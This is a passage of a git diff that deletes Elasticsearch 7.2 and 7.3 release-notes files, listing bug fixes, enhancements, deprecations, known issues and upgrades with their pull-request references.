-* StackOverflowError when calling BulkRequest#add {es-pull}41672[#41672] -* HLRC: Convert xpack methods to client side objects {es-pull}40705[#40705] (issue: {es-issue}40511[#40511]) -* Rest-High-Level-Client:fix uri encode bug when url path start with '/' {es-pull}34436[#34436] (issue: {es-issue}34433[#34433]) - -Features/Watcher:: -* NullPointerException when creating a watch with Jira action (#41922) {es-pull}42081[#42081] -* Fix minor watcher bug, unmute test, add additional debug logging {es-pull}41765[#41765] (issues: {es-issue}29893[#29893], {es-issue}30777[#30777], {es-issue}33291[#33291], {es-issue}35361[#35361]) -* Fix Watcher deadlock that can cause in-abilty to index documents. 
{es-pull}41418[#41418] (issue: {es-issue}41390[#41390]) - -Geo:: -* Improve error message when polygons contains twice the same point in no-consecutive position {es-pull}41051[#41051] (issue: {es-issue}40998[#40998]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39749[#39749] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Fix roundUp parsing with composite patterns {es-pull}43080[#43080] (issue: {es-issue}42835[#42835]) -* scheduleAtFixedRate would hang {es-pull}42993[#42993] (issue: {es-issue}38441[#38441]) -* Only ignore IOException when fsyncing on dirs {es-pull}42972[#42972] (issue: {es-issue}42950[#42950]) -* Fix node close stopwatch usage {es-pull}41918[#41918] -* Make ISO8601 date parser accept timezone when time does not have seconds {es-pull}41896[#41896] -* Allow unknown task time in QueueResizingEsTPE {es-pull}41810[#41810] (issue: {es-issue}41448[#41448]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) - -Infra/Packaging:: -* Don't create tempdir for cli scripts {es-pull}41913[#41913] (issue: {es-issue}34445[#34445]) -* Cleanup plugin bin directories {es-pull}41907[#41907] (issue: {es-issue}18109[#18109]) -* Update lintian overrides {es-pull}41561[#41561] (issue: {es-issue}17185[#17185]) -* Resolve JAVA_HOME at windows service install time {es-pull}39714[#39714] (issue: {es-issue}30720[#30720]) - -Infra/Settings:: -* Handle UTF-8 values in the keystore {es-pull}39496[#39496] -* Handle empty input in AddStringKeyStoreCommand {es-pull}39490[#39490] (issue: {es-issue}39413[#39413]) - -Machine Learning:: -* Fix possible race condition when closing an opening job {es-pull}42506[#42506] -* Exclude analysis fields with core field names from anomaly results {es-pull}41093[#41093] (issue: {es-issue}39406[#39406]) - -Mapping:: -* Fix possible NPE in put mapping validators {es-pull}43000[#43000] (issue: {es-issue}37675[#37675]) -* Fix merging of text field mappers {es-pull}40627[#40627] -* Fix an off-by-one error in the vector field dimension limit. {es-pull}40489[#40489] -* Fix not Recognizing Disabled Object Mapper {es-pull}39862[#39862] (issue: {es-issue}39456[#39456]) -* Avoid copying the field alias lookup structure unnecessarily. 
{es-pull}39726[#39726] -* Handle NaNs when detrending seasonal components {ml-pull}408[#408] - -Network:: -* Don't require TLS for single node clusters {es-pull}42826[#42826] -* Handle WRAP ops during SSL read {es-pull}41611[#41611] -* SSLDriver can transition to CLOSED in handshake {es-pull}41458[#41458] -* Handle Bulk Requests on Write Threadpool {es-pull}40866[#40866] (issues: {es-issue}39128[#39128], {es-issue}39658[#39658]) - -Percolator:: -* Fixed ignoring name parameter for percolator queries {es-pull}42598[#42598] (issue: {es-issue}40405[#40405]) - -Recovery:: -* Use translog to estimate number of operations in recovery {es-pull}42211[#42211] (issue: {es-issue}38904[#38904]) -* Recovery with syncId should verify seqno infos {es-pull}41265[#41265] -* Retain history for peer recovery using leases {es-pull}39133[#39133] - -Reindex:: -* Remote reindex failure parse fix {es-pull}42928[#42928] -* Fix concurrent search and index delete {es-pull}42621[#42621] (issue: {es-issue}28053[#28053]) -* Propogate version in reindex from remote search {es-pull}42412[#42412] (issue: {es-issue}31908[#31908]) - -Rollup:: -* Fix max boundary for rollup jobs that use a delay {es-pull}42158[#42158] -* Cleanup exceptions thrown during RollupSearch {es-pull}41272[#41272] (issue: {es-issue}38015[#38015]) -* Validate timezones based on rules not string comparision {es-pull}36237[#36237] (issue: {es-issue}36229[#36229]) - -SQL:: -* Fix wrong results when sorting on aggregate {es-pull}43154[#43154] (issue: {es-issue}42851[#42851]) -* Cover the Integer type when extracting values from _source {es-pull}42859[#42859] (issue: {es-issue}42858[#42858]) -* Fix precedence of `::` psql like CAST operator {es-pull}40665[#40665] - -Search:: -* Fix IntervalBuilder#analyzeText to never return `null` {es-pull}42750[#42750] (issue: {es-issue}42587[#42587]) -* Fix sorting on nested field with unmapped {es-pull}42451[#42451] (issue: {es-issue}33644[#33644]) -* Always set terminated_early if terminate_after is set in the search request {es-pull}40839[#40839] (issue: {es-issue}33949[#33949]) -* more_like_this query to throw an error if the like fields is not provided {es-pull}40632[#40632] -* Fixing 503 Service Unavailable errors during fetch phase {es-pull}39086[#39086] -* Fix IndexSearcherWrapper visibility {es-pull}39071[#39071] (issue: {es-issue}30758[#30758]) - -Snapshot/Restore:: -* Fix Azure List by Prefix Bug {es-pull}42713[#42713] -* Remove Harmful Exists Check from BlobStoreFormat {es-pull}41898[#41898] (issue: {es-issue}41882[#41882]) -* Restricts naming for repositories {es-pull}41008[#41008] (issue: {es-issue}40817[#40817]) -* SNAPSHOT: More Resilient Writes to Blob Stores {es-pull}36927[#36927] (issue: {es-issue}25281[#25281]) - -Suggesters:: -* Handle min_doc_freq in suggesters {es-pull}40840[#40840] (issue: {es-issue}16764[#16764]) - - -[[upgrade-7.2.0]] -[discrete] -=== Upgrades - -Features/Watcher:: -* Replace javax activation with jakarta activation {es-pull}40247[#40247] -* Replace java mail with jakarta mail {es-pull}40088[#40088] - -Infra/Core:: -* Update to joda time 2.10.2 {es-pull}42199[#42199] - -Network:: -* Upgrade to Netty 4.1.35 {es-pull}41499[#41499] - - - diff --git a/docs/reference/release-notes/7.3.asciidoc b/docs/reference/release-notes/7.3.asciidoc deleted file mode 100644 index b81ba78e7da..00000000000 --- a/docs/reference/release-notes/7.3.asciidoc +++ /dev/null @@ -1,609 +0,0 @@ -[[release-notes-7.3.2]] -== {es} version 7.3.2 - -Also see <>. 
- -[[bug-7.3.2]] -[discrete] -=== Bug fixes - -Data Frame:: -* Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] - -Distributed:: -* Update translog checkpoint after marking operations as persisted {es-pull}45634[#45634] (issue: {es-issue}29161[#29161]) - -Engine:: -* Handle delete document level failures {es-pull}46100[#46100] (issue: {es-issue}46083[#46083]) -* Handle no-op document level failures {es-pull}46083[#46083] - -Infra/Scripting:: -* Fix bugs in Painless SCatch node {es-pull}45880[#45880] - -Machine learning:: -* Throw an error when a datafeed needs {ccs} but it is not enabled for the node {es-pull}46044[#46044] - -SQL:: -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) - -Search:: -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Ensure top docs optimization is fully disabled for queries with unbounded max scores. {es-pull}46105[#46105] (issue: {es-issue}45933[#45933]) - - -[[release-notes-7.3.1]] -== {es} version 7.3.1 - -Also see <>. - -[[enhancement-7.3.1]] -[discrete] -=== Enhancements - -CCR:: -* Include leases in error message when operations are no longer available {es-pull}45681[#45681] - -Infra/Core:: -* Add OCI annotations and adjust existing annotations {es-pull}45167[#45167] (issues: {es-issue}45162[#45162], {es-issue}45166[#45166]) - -Infra/Settings:: -* Normalize environment paths {es-pull}45179[#45179] (issue: {es-issue}45176[#45176]) - -Machine Learning:: -* Outlier detection should only fetch docs that have the analyzed fields {es-pull}44944[#44944] - -SQL:: -* Remove deprecated use of "interval" from date_histogram usage {es-pull}45501[#45501] (issue: {es-issue}43922[#43922]) - - -[[bug-7.3.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix early termination of aggregators that run with breadth-first mode {es-pull}44963[#44963] (issue: {es-issue}44909[#44909]) - -Analysis:: -* Enable reloading of synonym_graph filters {es-pull}45135[#45135] (issue: {es-issue}45127[#45127]) - -Authentication:: -* Do not use scroll when finding duplicate API key {es-pull}45026[#45026] -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] - -CCR:: -* Clean up ShardFollowTasks for deleted indices {es-pull}44702[#44702] (issue: {es-issue}34404[#34404]) - -CRUD:: -* Allow _update on write alias {es-pull}45318[#45318] (issue: {es-issue}31520[#31520]) - -Data Frame:: -* Fix starting a batch {dataframe-transform} after stopping at runtime -{es-pull}45340[#45340] (issues: {es-issue}44219[#44219], {es-issue}45339[#45339]) -* Fix null aggregation handling in indexer {es-pull}45061[#45061] (issue: {es-issue}44906[#44906]) - -Distributed:: -* Ensure AsyncTask#isScheduled remains false after close {es-pull}45687[#45687] (issue: {es-issue}45576[#45576]) -* Fix clock used in update requests {es-pull}45262[#45262] (issue: {es-issue}45254[#45254]) -* Restore DefaultShardOperationFailedException's reason during deserialization {es-pull}45203[#45203] - -Features/Watcher:: -* Fix watcher HttpClient URL creation {es-pull}45207[#45207] (issue: {es-issue}44970[#44970]) - -Infra/Packaging:: -* Use bundled JDK in Sys V init {es-pull}45593[#45593] (issue: {es-issue}45542[#45542]) - -Infra/Settings:: -* Fix a bug with elasticsearch.common.settings.Settings.processSetting {es-pull}44047[#44047] (issue: {es-issue}43791[#43791]) - 
-MULTIPLE AREA LABELS:: -* Fix a bug where mappings are dropped from rollover requests. {es-pull}45411[#45411] (issue: {es-issue}45399[#45399]) -* Sparse role queries can throw an NPE {es-pull}45053[#45053] - -Machine Learning:: -* Check dest index is empty when starting {dfanalytics} {es-pull}45094[#45094] -* Catch any error thrown while closing {dfanalytics} process {es-pull}44958[#44958] -* Only trap the case where more rows are supplied to outlier detection than -expected. Previously, if rows were excluded from the {dataframe-transform} after supplying the row count in the configuration, we detected the inconsistency and -failed outlier detection. However, this situation legitimately happens in cases -where the field values are non-numeric or array valued. {ml-pull}569[#569] - -Mapping:: -* Make sure to validate the type before attempting to merge a new mapping. {es-pull}45157[#45157] (issues: {es-issue}29316[#29316], {es-issue}43012[#43012]) - -SQL:: -* Adds format parameter to range queries for constant date comparisons {es-pull}45326[#45326] (issue: {es-issue}45139[#45139]) -* Uniquely named inner_hits sections for each nested field condition {es-pull}45039[#45039] (issues: {es-issue}33080[#33080], {es-issue}44544[#44544]) -* Fix URI path being lost in case of hosted ES scenario {es-pull}44776[#44776] (issue: {es-issue}44721[#44721]) - -Search:: -* Prevent Leaking Search Tasks on Exceptions in FetchSearchPhase and DfsQueryPhase {es-pull}45500[#45500] -* Fix an NPE when requesting inner hits and _source is disabled. {es-pull}44836[#44836] (issue: {es-issue}43517[#43517]) - -Security:: -* Fix .security-* indices auto-create {es-pull}44918[#44918] -* Use system context for looking up connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) - - - -[[upgrade-7.3.1]] -[discrete] -=== Upgrades - -Infra/Packaging:: -* Upgrade to JDK 12.0.2 {es-pull}45172[#45172] - - -[[release-notes-7.3.0]] -== {es} version 7.3.0 - -Also see <>. - - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. 
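
The first known issue above recommends keeping a shrunken index read-only and force-merging it after the shrink. As a minimal illustrative sketch, assuming a hypothetical shrink target named `my-shrunken-index` (the index name is made up; the two calls are the standard update-index-settings and force-merge APIs, and `max_num_segments=1` is simply one reasonable choice):

[source,console]
----
PUT /my-shrunken-index/_settings
{
  "index.blocks.write": true
}

POST /my-shrunken-index/_forcemerge?max_num_segments=1
----
// TEST[skip:illustrative sketch, my-shrunken-index is a placeholder]

Leaving the write block in place afterwards matters because, per the known issue, the corruption is only triggered when deletes or updates are applied to an index that has already been shrunk.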
- - -[[breaking-7.3.0]] -[discrete] -=== Breaking changes - -CCR:: -* Do not allow modify aliases on followers {es-pull}43017[#43017] (issue: {es-issue}41396[#41396]) - -Data Frame:: -* Removing format support in date_histogram group_by {es-pull}43659[#43659] - -[[breaking-java-7.3.0]] -[discrete] -=== Breaking Java changes - -Mapping:: -* Refactor put mapping request validation for reuse {es-pull}43005[#43005] (issues: {es-issue}37675[#37675], {es-issue}41396[#41396]) - -Search:: -* Refactor IndexSearcherWrapper to disallow the wrapping of IndexSearcher {es-pull}43645[#43645] - - - -[[deprecation-7.3.0]] -[discrete] -=== Deprecations - -Features/Java High Level REST Client:: -* Deprecate native code info in xpack info api {es-pull}43297[#43297] - -Mapping:: -* Deprecate support for chained multi-fields. {es-pull}41926[#41926] (issue: {es-issue}41267[#41267]) - -Network:: -* Deprecate transport profile security type setting {es-pull}43237[#43237] - -Search:: -* Deprecate CommonTermsQuery and cutoff_frequency {es-pull}42619[#42619] (issue: {es-issue}37096[#37096]) - - - -[[feature-7.3.0]] -[discrete] -=== New features - -Aggregations:: -* Adds a minimum interval to `auto_date_histogram`. {es-pull}42814[#42814] (issue: {es-issue}41757[#41757]) -* Add RareTerms aggregation {es-pull}35718[#35718] (issue: {es-issue}20586[#20586]) - -Audit:: -* Enable console audit logs for docker {es-pull}42671[#42671] (issue: {es-issue}42666[#42666]) - -Data Frame:: -* Add sync api {es-pull}41800[#41800] - -Infra/Settings:: -* Consistent Secure Settings {es-pull}40416[#40416] - -Machine Learning:: -* Machine learning data frame analytics {es-pull}43544[#43544] - -Mapping:: -* Add support for 'flattened object' fields. {es-pull}42541[#42541] (issues: {es-issue}25312[#25312], {es-issue}33003[#33003]) - -Ranking:: -* Move dense_vector and sparse_vector to module {es-pull}43280[#43280] - -SQL:: -* SQL: Add support for FROZEN indices {es-pull}41558[#41558] (issues: {es-issue}39377[#39377], {es-issue}39390[#39390]) - -Search:: -* Wildcard intervals {es-pull}43691[#43691] (issue: {es-issue}43198[#43198]) -* Add prefix intervals source {es-pull}43635[#43635] (issue: {es-issue}43198[#43198]) - - - -[[enhancement-7.3.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Allocate memory lazily in BestBucketsDeferringCollector {es-pull}43339[#43339] (issue: {es-issue}43091[#43091]) -* Reduce the number of docvalues iterator created in the global ordinals fielddata {es-pull}43091[#43091] - -Analysis:: -* Return reloaded analyzers in _reload_search_ananlyzer response {es-pull}43813[#43813] (issue: {es-issue}43804[#43804]) -* Allow reloading of search time analyzers {es-pull}43313[#43313] (issue: {es-issue}29051[#29051]) -* Allow reloading of search time analyzers {es-pull}42888[#42888] (issue: {es-issue}29051[#29051]) -* Allow reloading of search time analyzers {es-pull}42669[#42669] (issue: {es-issue}29051[#29051]) - -Authentication:: -* Always attach system user to internal actions {es-pull}43468[#43468] (issue: {es-issue}42215[#42215]) -* Add kerberos grant_type to get token in exchange for Kerberos ticket {es-pull}42847[#42847] (issue: {es-issue}41943[#41943]) -* Permit API Keys on Basic License {es-pull}42787[#42787] - -Authorization:: -* Add "manage_api_key" cluster privilege {es-pull}43728[#43728] (issue: {es-issue}42020[#42020]) -* Use separate BitSet cache in Doc Level Security {es-pull}43669[#43669] (issue: {es-issue}30974[#30974]) -* Support builtin privileges in get privileges API {es-pull}42134[#42134] (issue: 
{es-issue}29771[#29771]) - -CCR:: -* Replicate aliases in cross-cluster replication {es-pull}41815[#41815] (issue: {es-issue}41396[#41396]) - -Cluster Coordination:: -* Ignore unknown fields if overriding node metadata {es-pull}44689[#44689] -* Add voting-only master node {es-pull}43410[#43410] (issue: {es-issue}14340[#14340]) -* Defer reroute when nodes join {es-pull}42855[#42855] -* Stop SeedHostsResolver on shutdown {es-pull}42844[#42844] -* Log leader and handshake failures by default {es-pull}42342[#42342] (issue: {es-issue}42153[#42153]) - -Data Frame:: -* Add a frequency option to transform config, default 1m {es-pull}44120[#44120] -* Add node attr to GET _stats {es-pull}43842[#43842] (issue: {es-issue}43743[#43743]) -* Add deduced mappings to _preview response payload {es-pull}43742[#43742] (issue: {es-issue}39250[#39250]) -* Add support for allow_no_match for endpoints {es-pull}43490[#43490] (issue: {es-issue}42766[#42766]) -* Add version and create_time to transform config {es-pull}43384[#43384] (issue: {es-issue}43037[#43037]) -* Have sum map to a double to prevent overflows {es-pull}43213[#43213] -* Add new pipeline field to dest config {es-pull}43124[#43124] (issue: {es-issue}43061[#43061]) -* Write a warning audit on bulk index failures {es-pull}43106[#43106] -* Add support for weighted_avg agg {es-pull}42646[#42646] - -Distributed:: -* Improve Close Index Response {es-pull}39687[#39687] (issue: {es-issue}33888[#33888]) - -Engine:: -* Use reader attributes to control term dict memory useage {es-pull}42838[#42838] (issue: {es-issue}38390[#38390]) -* Remove sort by primary term when reading soft-deletes {es-pull}43845[#43845] -* Refresh translog stats after translog trimming in NoOpEngine {es-pull}43825[#43825] (issue: {es-issue}43156[#43156]) -* Expose translog stats in ReadOnlyEngine {es-pull}43752[#43752] -* Do not use soft-deletes to resolve indexing strategy {es-pull}43336[#43336] (issues: {es-issue}35230[#35230], {es-issue}42979[#42979], {es-issue}43202[#43202]) -* Rebuild version map when opening internal engine {es-pull}43202[#43202] (issues: {es-issue}40741[#40741], {es-issue}42979[#42979]) -* Only load FST off heap if we are actually using mmaps for the term dictionary {es-pull}43158[#43158] (issue: {es-issue}43150[#43150]) -* Trim translog for closed indices {es-pull}43156[#43156] (issue: {es-issue}42445[#42445]) -* Also mmap terms index (`.tip`) files for hybridfs {es-pull}43150[#43150] (issue: {es-issue}42838[#42838]) -* Add a merge policy that prunes ID postings for soft-deleted but retained documents {es-pull}40741[#40741] - -Features/Indices APIs:: -* Remove "template" field in IndexTemplateMetadata {es-pull}42099[#42099] (issue: {es-issue}38502[#38502]) - -Features/Ingest:: -* Avoid HashMap construction on Grok non-match {es-pull}42444[#42444] -* Improve how internal representation of pipelines are updated {es-pull}42257[#42257] - -Features/Java High Level REST Client:: -* Add _reload_search_analyzers endpoint to HLRC {es-pull}43733[#43733] (issue: {es-issue}43313[#43313]) -* Bulk processor concurrent requests {es-pull}41451[#41451] - -Features/Java Low Level REST Client:: -* Adapt low-level REST client to java 8 {es-pull}41537[#41537] (issue: {es-issue}38540[#38540]) - -Features/Monitoring:: -* Expand beats_system role privileges {es-pull}40876[#40876] - -Features/Watcher:: -* Improve CryptoService error message on missing secure file {es-pull}43623[#43623] (issue: {es-issue}43619[#43619]) -* Watcher: Allow to execute actions for each element in array 
{es-pull}41997[#41997] (issue: {es-issue}34546[#34546]) - -Infra/Core:: -* Shortcut simple patterns ending in `*` {es-pull}43904[#43904] -* Prevent merging nodes' data paths {es-pull}42665[#42665] (issue: {es-issue}42489[#42489]) -* Deprecation info for joda-java migration on 7.x {es-pull}42659[#42659] (issue: {es-issue}42010[#42010]) -* Implement XContentParser.genericMap and XContentParser.genericMapOrdered methods {es-pull}42059[#42059] - -Infra/Packaging:: -* Omit JDK sources archive from bundled JDK {es-pull}42821[#42821] - -Infra/Plugins:: -* Enable node roles to be pluggable {es-pull}43175[#43175] - -Infra/Scripting:: -* Add annotations to Painless whitelist {es-pull}43239[#43239] -* Add painless method getByPath, get value from nested collections with dotted path {es-pull}43170[#43170] (issue: {es-issue}42769[#42769]) -* Add painless method getByPath, get value from nested collections with dotted path {es-pull}43129[#43129] (issue: {es-issue}42769[#42769]) - -Machine Learning:: -* Add version and create_time to data frame analytics config {es-pull}43683[#43683] -* Improve message when native controller cannot connect {es-pull}43565[#43565] (issue: {es-issue}42341[#42341]) -* Report exponential_avg_bucket_processing_time which gives more weight to recent buckets {es-pull}43189[#43189] (issue: {es-issue}29857[#29857]) -* Adding support for geo_shape, geo_centroid, geo_point in datafeeds {es-pull}42969[#42969] (issue: {es-issue}42820[#42820]) -* Report timing stats as part of the Job stats response {es-pull}42709[#42709] (issue: {es-issue}29857[#29857]) -* Increase maximum forecast interval to 10 years. {es-pull}41082[#41082] (issue: {es-issue}41103[#41103]) -* Upgrade to a newer version of the Apache Portable Runtime library. {ml-pull}495[#495] -* Improve stability of modelling around change points. 
{ml-pull}496[#496] -* Restrict detection of epoch timestamps in find_file_structure {es-pull}43188[#43188] -* Better detection of binary input in find_file_structure {es-pull}42707[#42707] -* Add a limit on line merging in find_file_structure {es-pull}42501[#42501] (issue: {es-issue}38086[#38086]) -* Improve file structure finder timestamp format determination {es-pull}41948[#41948] (issues: {es-issue}35132[#35132], {es-issue}35137[#35137], {es-issue}38086[#38086]) -* Add earliest and latest timestamps to field stats in find_file_structure response {es-pull}42890[#42890] -* Change dots in CSV column names to underscores in find_file_structure response {es-pull}42839[#42839] (issue: {es-issue}26800[#26800]) - -Mapping:: -* Add dims parameter to dense_vector mapping {es-pull}43444[#43444] -* Added parsing of erroneous field value {es-pull}42321[#42321] (issue: {es-issue}41372[#41372]) - -Network:: -* Do not hang on unsupported HTTP methods {es-pull}43362[#43362] - -Ranking:: -* Fix parameter value for calling data.advanceExact {es-pull}44205[#44205] -* Distance measures for dense and sparse vectors {es-pull}37947[#37947] (issue: {es-issue}31615[#31615]) - -Recovery:: -* Make peer recovery send file info step async {es-pull}43792[#43792] (issue: {es-issue}36195[#36195]) -* Make peer recovery clean files step async {es-pull}43787[#43787] (issue: {es-issue}36195[#36195]) - -Reindex:: -* Reindex max_docs parameter name {es-pull}41894[#41894] (issue: {es-issue}24344[#24344]) - -Search:: -* Split search in two when made against read-only and write indices {es-pull}42510[#42510] (issue: {es-issue}40900[#40900]) -* Rename SearchRequest#crossClusterSearch {es-pull}42363[#42363] -* Allow `fields` to be set to `*` {es-pull}42301[#42301] (issue: {es-issue}39577[#39577]) -* Search - enable low_level_cancellation by default. 
{es-pull}42291[#42291] (issue: {es-issue}26258[#26258]) -* Cut over ClusterSearchShardsGroup to Writeable {es-pull}41788[#41788] -* Disable max score optimization for queries with unbounded max scores {es-pull}41361[#41361] - -Snapshot/Restore:: -* Recursive Delete on BlobContainer {es-pull}43281[#43281] (issue: {es-issue}42189[#42189]) -* Add SAS Token Authentication Support to Azure Repo Plugin {es-pull}42982[#42982] (issue: {es-issue}42117[#42117]) -* Enable Parallel Deletes in Azure Repository {es-pull}42783[#42783] -* Add Ability to List Child Containers to BlobContainer {es-pull}42653[#42653] (issue: {es-issue}42189[#42189]) -* Add custom metadata to snapshots {es-pull}41281[#41281] (issue: {es-issue}40638[#40638]) - -Store:: -* Shard CLI tool always check shards {es-pull}41480[#41480] (issue: {es-issue}41298[#41298]) - - - -[[bug-7.3.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix incorrect calculation of how many buckets will result from a merge {es-pull}44461[#44461] (issue: {es-issue}43577[#43577]) -* Set document on script when using Bytes.WithScript {es-pull}43390[#43390] -* Bug fix to allow access to top level params in reduce script {es-pull}42096[#42096] (issue: {es-issue}42046[#42046]) - -Allocation:: -* Do not copy initial recovery filter during split {es-pull}44053[#44053] (issue: {es-issue}43955[#43955]) -* Avoid parallel reroutes in DiskThresholdMonitor {es-pull}43381[#43381] (issue: {es-issue}40174[#40174]) -* Reset failed allocation counter before executing routing commands {es-pull}42658[#42658] (issue: {es-issue}39546[#39546]) -* Validate routing commands using updated routing state {es-pull}42066[#42066] (issue: {es-issue}41050[#41050]) - -Analysis:: -* Fix AnalyzeAction response serialization {es-pull}44284[#44284] (issue: {es-issue}44078[#44078]) -* Actually close IndexAnalyzers contents {es-pull}43914[#43914] -* Issue deprecation warnings for preconfigured delimited_payload_filter {es-pull}43684[#43684] (issues: {es-issue}26625[#26625], {es-issue}43568[#43568]) -* Use preconfigured filters correctly in Analyze API {es-pull}43568[#43568] (issue: {es-issue}43002[#43002]) -* Require [articles] setting in elision filter {es-pull}43083[#43083] (issue: {es-issue}43002[#43002]) - -Authentication:: -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] -* Fix Token Service retry mechanism {es-pull}39639[#39639] - -CCR:: -* Skip update if leader and follower settings identical {es-pull}44535[#44535] (issue: {es-issue}44521[#44521]) -* Avoid stack overflow in auto-follow coordinator {es-pull}44421[#44421] (issue: {es-issue}43251[#43251]) -* Avoid NPE when checking for CCR index privileges {es-pull}44397[#44397] (issue: {es-issue}44172[#44172]) -* CCR should not replicate private/internal settings {es-pull}43067[#43067] (issue: {es-issue}41268[#41268]) - -CRUD:: -* Fix NPE when rejecting bulk updates {es-pull}42923[#42923] -* Fix "size" field in the body of AbstractBulkByScrollRequest {es-pull}35742[#35742] (issue: {es-issue}35636[#35636]) - -Cluster Coordination:: -* Local node is discovered when cluster fails {es-pull}43316[#43316] -* Reset state recovery after successful recovery {es-pull}42576[#42576] (issue: {es-issue}39172[#39172]) -* Cluster state from API should always have a master {es-pull}42454[#42454] (issues: {es-issue}38331[#38331], {es-issue}38432[#38432]) -* Omit non-masters in ClusterFormationFailureHelper {es-pull}41344[#41344] - -Data Frame:: -* Treat bulk index failures as an indexing failure {es-pull}44351[#44351] (issue: 
{es-issue}44101[#44101]) -* Responding with 409 status code when failing _stop {es-pull}44231[#44231] (issue: {es-issue}44103[#44103]) -* Adds index validations to _start data frame transform {es-pull}44191[#44191] (issue: {es-issue}44104[#44104]) -* Data frame task failure do not make a 500 response {es-pull}44058[#44058] (issue: {es-issue}44011[#44011]) -* Audit message missing for autostop {es-pull}43984[#43984] (issue: {es-issue}43977[#43977]) -* Add data frame transform cluster privileges to HLRC {es-pull}43879[#43879] -* Improve pivot nested field validations {es-pull}43548[#43548] -* Adjusting error message {es-pull}43455[#43455] -* Size the GET stats search by number of Ids requested {es-pull}43206[#43206] (issue: {es-issue}43203[#43203]) -* Rewrite start and stop to answer with acknowledged {es-pull}42589[#42589] (issue: {es-issue}42450[#42450]) -* Set data frame transform task state to stopped when stopping {es-pull}42516[#42516] (issue: {es-issue}42441[#42441]) - -Distributed:: -* Fix DefaultShardOperationFailedException subclass xcontent serialization {es-pull}43435[#43435] (issue: {es-issue}43423[#43423]) -* Advance checkpoints only after persisting ops {es-pull}43205[#43205] -* Avoid loading retention leases while writing them {es-pull}42620[#42620] (issue: {es-issue}41430[#41430]) -* Do not use ifSeqNo for update requests on mixed cluster {es-pull}42596[#42596] (issue: {es-issue}42561[#42561]) -* Ensure relocation target still tracked when start handoff {es-pull}42201[#42201] - -Engine:: -* AsyncIOProcessor preserve thread context {es-pull}43729[#43729] -* Account soft deletes for committed segments {es-pull}43126[#43126] (issue: {es-issue}43103[#43103]) -* Prune _id of only docs below local checkpoint of safe commit {es-pull}43051[#43051] (issues: {es-issue}40741[#40741], {es-issue}42979[#42979]) -* Improve translog corruption detection {es-pull}42744[#42744] (issue: {es-issue}42661[#42661]) - -Features/CAT APIs:: -* Fix indices shown in _cat/indices {es-pull}43286[#43286] (issues: {es-issue}33888[#33888], {es-issue}38824[#38824], {es-issue}39933[#39933]) - -Features/ILM:: -* Fix swapped variables in error message {es-pull}44300[#44300] -* Account for node versions during allocation in ILM Shrink {es-pull}43300[#43300] (issue: {es-issue}41879[#41879]) -* Narrow period of Shrink action in which ILM prevents stopping {es-pull}43254[#43254] (issue: {es-issue}43253[#43253]) -* Make ILM force merging best effort {es-pull}43246[#43246] (issues: {es-issue}42824[#42824], {es-issue}43245[#43245]) - -Features/Indices APIs:: -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) -* Prevent NullPointerException in TransportRolloverAction {es-pull}43353[#43353] (issue: {es-issue}43296[#43296]) - -Features/Ingest:: -* Read the default pipeline for bulk upsert through an alias {es-pull}41963[#41963] - -Features/Java High Level REST Client:: -* Fix CreateRepository Requeset in HLRC {es-pull}43522[#43522] (issue: {es-issue}43521[#43521]) - -Features/Stats:: -* Return 0 for negative "free" and "total" memory reported by the OS {es-pull}42725[#42725] (issue: {es-issue}42157[#42157]) - -Features/Watcher:: -* NullPointerException when creating a watch with Jira action (#41922) {es-pull}42081[#42081] -* fix unlikely bug that can prevent Watcher from restarting 
{es-pull}42030[#42030] - -Infra/Core:: -* Add default CLI JVM options {es-pull}44545[#44545] (issues: {es-issue}219[#219], {es-issue}42021[#42021]) -* scheduleAtFixedRate would hang {es-pull}42993[#42993] (issue: {es-issue}38441[#38441]) -* Only ignore IOException when fsyncing on dirs {es-pull}42972[#42972] (issue: {es-issue}42950[#42950]) -* Fix alpha build error message when generate version object from version string {es-pull}40406[#40406] -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) - -Infra/Packaging:: -* Restore setting up temp dir for windows service {es-pull}44541[#44541] -* Fix the bundled jdk flag to be passed through windows startup {es-pull}43502[#43502] - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Infra/REST API:: -* Remove deprecated _source_exclude and _source_include from get API spec {es-pull}42188[#42188] - -Infra/Scripting:: -* Allow aggregations using expressions to use _score {es-pull}42652[#42652] - -Machine Learning:: -* Update .ml-config mappings before indexing job, datafeed or df analytics config {es-pull}44216[#44216] (issue: {es-issue}44263[#44263]) -* Wait for .ml-config primary before assigning persistent tasks {es-pull}44170[#44170] (issue: {es-issue}44156[#44156]) -* Fix ML memory tracker lockup when 